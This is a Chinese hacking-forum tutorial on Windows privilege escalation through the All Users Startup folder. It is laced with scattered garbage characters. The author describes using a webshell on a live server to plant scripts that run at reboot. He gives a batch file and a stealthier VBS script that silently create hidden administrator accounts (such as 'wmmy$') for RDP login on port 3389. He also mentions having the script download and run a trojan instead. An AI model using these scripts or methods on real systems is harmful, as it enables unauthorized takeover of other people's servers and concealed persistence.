  
- 帖子
- 575
- 积分
- 1897
- 威望
- 2479
- 金钱
- 15914
- 在线时间
- 175 小时
             
|
大家好,我是完美蚂蚁 今天给大家带来的提权教程是
4 q9 E) e0 V7 r启动 提权
2 D4 i" B$ z* @/ H, wC:\Docume~1\All Users\「开始」菜单\程序\启动
: F7 m! X- p+ ~* F/ t0 C在这里必须有写入权限 否则此方法无效
3 v8 e& s/ ^. p& n% n" I' S4 J" _因为我是在网吧 这里显示不了路径& `; M5 t7 @8 T+ u
我去服务器上演示给大家看- P @: l4 q; B3 a8 _( f G8 v
大家看到了把 就是这个路径 在这个里面写入文件 等候服务器从起 就会自动执行我们的
& ?% I& P# a8 n0 t- A. P% ~7 B文件 从而运行我们的文件* Y [* x: {9 [
这里有两中方式 第一种是批处理
+ f( R, }) R I& z我们来看下目前 我机器上的用户组
5 H7 R8 B# V! s5 [. P+ |1 _目前我们没有521这个用户
- w% ^' h, {8 M& g1 a w看到了把 已经添加到管理组中去了 刚才我们运行程序的时候 一闪而过一个黑色提示1 m% ]- y% v% F
大家看到了吧 如果是在服务器上运行 一样会有这个提示的 细心的管理员有可能发现- G' _$ p0 ~& n/ h
下面我们来介绍第二中方法使用VBS脚本 大家都知道VBS脚本是没有这个提示的
9 {7 Z, }' @1 h6 `4 ~: Q大家看 已经成功加入了WMMY用户# z9 w( a* }4 M, c' T
网络实战才是我们练手的目的 我已经找到一个含有这种漏洞的WBESHELL了
. R {8 X9 u5 M1 W/ E5 z' ^当前终端服务端口: 3389$ ?# d |: J9 H% J$ k
系统自动登录功能未开启3 [+ u( \/ J( F# u+ d$ O+ R
3389 已经打开了 我们只需要拥有一个管理员权限的用户就可以了
# \" _+ J' P T/ z7 nC:\Docume~1\All Users\「开始」菜单\程序\启动 这个是默认的路径
: H0 V9 M" \" Z3 S9 v第一种隐蔽性太差 我们就用第二种吧0 x+ ]$ K/ {2 t2 T' ^
已经写入了 我们只需要等待服务器从起 那个VBS脚本文件就会把我们的用户加入进去7 d5 I. d Z( }+ g. t6 j
从而取得了3389的登陆权限
5 k# i# m' i8 _+ _其实在VBS脚本中 我们不一定需要添加管理员帐户可以 直接让VBS下载运行我们的木马' S- Q/ | h1 p
基本原理都差不多 我就不多介绍了% j( D% B7 p( N6 n( Q4 V. r: v% N
教程结束```$ K8 W4 o3 M; \3 u
@echo off2 V" c" w$ F* Q- n4 `9 O
net user 521 521 /add
2 u4 A( Y. L# m0 O$ mnet localgroup administrators 521 /add, V- E; V: e% N9 T4 w
X' ^1 M+ p' U& u' S3 j4 y: z) Ron Error Resume next
# w- q$ O9 o& A- [/ b5 |. [7 Aset wshshell=createobject("wscript.shell")' s2 @3 c& R! N0 F1 M
a=wshshell.run("net user wmmy$ 1227 /add",0)
: O1 S6 a( W Ca=wshshell.run("net localgroup administrators wmmy$ /add",0)4 k3 U" a# U# E9 i& a* _" L( h' S
6 r3 H- X s) r
7 v( ]- n7 S4 z U
点击下载) U8 J, G) G0 I; Q
|
-
2
评分人数
-
|